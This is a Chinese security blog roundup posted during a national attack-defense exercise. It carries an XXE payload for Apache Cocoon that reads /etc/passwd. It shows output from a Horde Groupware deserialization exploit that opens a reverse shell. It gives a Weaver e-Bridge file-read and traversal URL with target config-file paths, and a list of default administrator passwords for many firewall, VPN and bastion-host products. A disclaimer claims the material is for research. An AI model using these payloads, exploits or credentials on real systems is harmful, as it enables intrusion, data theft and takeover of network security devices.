HW平安夜: 09/13 透过迷雾

admin 2020年9月13日20:51:25评论392 views字数 2267阅读7分33秒阅读模式


“今天怎么都没动静,攻击队是不是没吃饭呀。”

“攻击队被扣分成负淘汰了吧。


不会吧,不会吧

你们该不会就是攻击队今天说的那个

被拿下威胁告警平台把规则都删了的厂商吧



0、Apache Cocoon XML注入 [CVE-2020-11991]
来源:http://mail-archives.apache.org/mod_mbox/cocoon-users/202009.mbox/author
程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。
1、漏洞利用条件有限必须是apacheCocoon且使用了StreamGenerator,也就是说只要传输的数据被解析就可以实现了。
2、为了大饱眼福老大哥们,小编自己写了整了一个环境。
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName
<lastName>&ent;</lastName>
</userInfo>
HW平安夜:  09/13 透过迷雾


1、Horde Groupware Webmail Edition 远程命令执行
来源: https://srcincite.io/pocs/zdi-20-1051.py.txt

saturn:~$./poc.py 172.16.175.148/horde/ hordeuser:pass123 172.16.175.145
(+) targeting http://172.16.175.145/horde/
(+) obtained session iefankvohbl8og0mtaadm3efb6
(+) inserted our php object
(+) triggering deserialization...
(+) starting handler on port 1337
(+) connection from 172.16.175.145
(+) pop thy shell!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/horde/services


2、泛微云桥任意文件读取升级玩法。
来源: 安识科技A-Team
昨天安全问题报告发出来似乎并没有玩转它,中午又收到安识科技A-Team投稿,想到一个新的思路,能够在漏洞利用过程中找到更多有用的信息。

1、简单说说昨天泛微云桥的报告,输入文件路径->读取文件内容,我们读了一下代码后发现这还能读取文件目录。
2、参数不填写绝对路径写进文本内容就是当前的目录,产生了一个新的漏洞 “目录遍历”
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt
HW平安夜:  09/13 透过迷雾
3、目录遍历+文件读取,我们能做的事情就很多了,比如读取管理员在桌面留下的密码文件、数据库配置文件、nginx代理配置、访问日志、D盘迅雷下载


d://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.properties
d:/OA/tomcat8/webapps/OAMS/WEB-INF/classes/dbconfig.properties 泛微OA数据库
HW平安夜:  09/13 透过迷雾

安全设备弱密码排查列表
来源: 热心网友提供
其实这些设备本身是没有弱密码的,用户安全意识不足使用了不安全的密码。HW平安夜:  09/13 透过迷雾

HW平安夜:  09/13 透过迷雾

天融信防火墙 用户名:superman 密码:talent

天融信防火墙 用户名:superman 密码:talent!23 

联想网御防火墙 用户名:admin 密码:leadsec@7766、administrator、bane@7766

深信服防火墙 用户名:admin 密码:admin

启明星辰 用户名:admin 密码:bane@7766 用户名:admin 密码:admin@123

juniper 用户名:netscreen 密码:netscreen

Cisco 用户名:admin 密码:cisco

Huawei 用户名:admin 密码:Admin@123 

H3C 用户名:admin 密码:admin

绿盟IPS 用户名: weboper 密码: weboper

网神防火墙GE1 用户名:admin 密码:firewall

深信服VPN:51111端口   密码:delanrecover

华为VPN:账号:root  密码:mduadmin

华为防火墙:admin   密码:Admin@123    

EudemonJuniper防火墙:netscreen    netscreen

迪普 192.168.0.1 默认的用户名和密码(admin/admin_default)

山石 192.168.1.1 默认的管理账号为hillstone,密码为hillstone

安恒的明御防火墙 admin/adminadmin

某堡垒机 shterm/shterm

天融信的vpn test/123456


回顾一下HW 2020/09/13:
一个浪头尚未平复,另一个浪头又掀起了。
关于蜜罐安全问题,在没有官方公告证实之前都把这个话题收收吧。
昨天文章说到了蜜罐内网环境隔离,有小伙伴在公众号留言处理的够及时。
打没打进去我不知道,反正看到蜜罐被打了一晚上。

蓝队小哥: 攻击队呢 没吃饭?没有看到严重告警攻击队就是没有劲。
攻击队: 下一个就轮到你了。



素材均来自网络

HW平安夜:  09/13 透过迷雾

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月13日20:51:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HW平安夜: 09/13 透过迷雾https://cn-sec.com/archives/131199.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息